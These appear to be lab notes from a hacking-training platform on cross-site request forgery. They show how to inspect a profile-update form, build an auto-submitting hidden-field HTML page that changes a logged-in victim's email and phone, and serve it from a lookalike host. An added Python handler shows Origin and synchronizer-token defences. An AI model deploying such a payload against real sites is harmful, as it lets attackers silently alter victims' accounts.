W/O ANTI-CSRF TOKEN
#compromise/access web pages
root@oco:~$ BROWSER > {targetSite:port}
...
* once accessed, review the page source to identify any forms that could be abused
#study the web form of the site
root@oco:~$ BROWSER > {targetSite:port} > CTRL + U
<form id="updateProfileForm" action="/api/update-profile" method="post">
<div class="content" id="userProfileData">
<div class="field is-small">
<label class="label">Email</label>
<div class="control">
<input class="input" name="email" id="userProfileEmailInput" type="email">
</div>
<label class="label">Telephone</label>
<div class="control">
<input class="input" name="telephone" id="userProfileTelInput" type="text">
</div>
<label class="label">Country</label>
<div class="control">
<input class="input" name="country" id="userProfileCountryInput" type="text">
</div>
</div>
</div>
</form>
* pertinent info gathered from the source
- action="/api/update-profile" method="post"
- <input class="input" name="email" id="userProfileEmailInput" type="email">
- <input class="input" name="telephone" id="userProfileTelInput" type="text">
- <input class="input" name="country" id="userProfileCountryInput" type="text">
#craft payload
root@oco:~$ nano notmalicious.html
<html>
<body>
<form id="submitMe" action="http://xss.htb.net/api/update-profile" method="POST">
<input type="hidden" name="email" value="attacker@htb.net" />
<input type="hidden" name="telephone" value="(227)-750-8112" />
<input type="hidden" name="country" value="CSRF_POC" />
<input type="submit" value="Submit request" />
</form>
<script>
document.getElementById("submitMe").submit()
</script>
</body>
</html>
#serve the payload
root@oco:~$ python -m http.server 1337
Serving HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ...
#expected target trigger
#assumptions and expectations
# - the target must be logged in and authenticated to the legitimate web page
# - the malicious HTML must resemble the legitimate web page and be served from a
# domain that closely resembles the target web page visited by the victim for this to work
# - the target web page must be vulnerable, e.g. no anti-CSRF protection or misconfigured anti-CSRF protection
root@target:~$ BROWSER > http://{attackerSite:port}/notmalicious.html
* the impact in this scenario is on data integrity: the victim's personal information has been modified simply by visiting another web page
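* added example (not part of these notes): a hardened handler for the /api/update-profile endpoint that rejects the forged POST above by checking the browser-set Origin header and a per-session synchronizer token; the SESSIONS store, function names and the attacker origin used in the comments are hypothetical stand-ins, not a real framework

```python
import hmac
import secrets

# Constructed stand-in for the application's server-side session store
# (hypothetical; a real app would use its framework's session backend).
SESSIONS = {}                        # session_id -> session data
SITE_ORIGIN = "http://xss.htb.net"   # origin of the legitimate site named above


def new_session():
    """Create a logged-in session and mint a random per-session anti-CSRF token."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"csrf_token": secrets.token_urlsafe(32)}
    return sid


def render_form_fields(sid):
    """Hidden fields the legitimate profile form must embed so its own POST carries the token."""
    return {"csrf_token": SESSIONS[sid]["csrf_token"]}


def handle_update_profile(cookies, headers, form):
    """Hardened POST /api/update-profile. Returns (status, reason)."""
    session = SESSIONS.get(cookies.get("session"))
    if session is None:
        return 401, "not authenticated"
    # Defence 1: the Origin header is set by the browser and cannot be forged by a
    # cross-site page. The notmalicious.html form is posted from the attacker's host,
    # so its Origin differs; a missing Origin is also rejected (fail closed).
    if headers.get("Origin") != SITE_ORIGIN:
        return 403, "cross-origin request rejected"
    # Defence 2: synchronizer token tied to the session. A cross-site page cannot
    # read the victim's copy of the token, so it cannot supply the right value.
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(supplied, session["csrf_token"]):
        return 403, "missing or invalid anti-CSRF token"
    # Only now apply the update; the writable fields match the form on the page.
    for key in ("email", "telephone", "country"):
        session[key] = form.get(key, "")
    return 200, "profile updated"
```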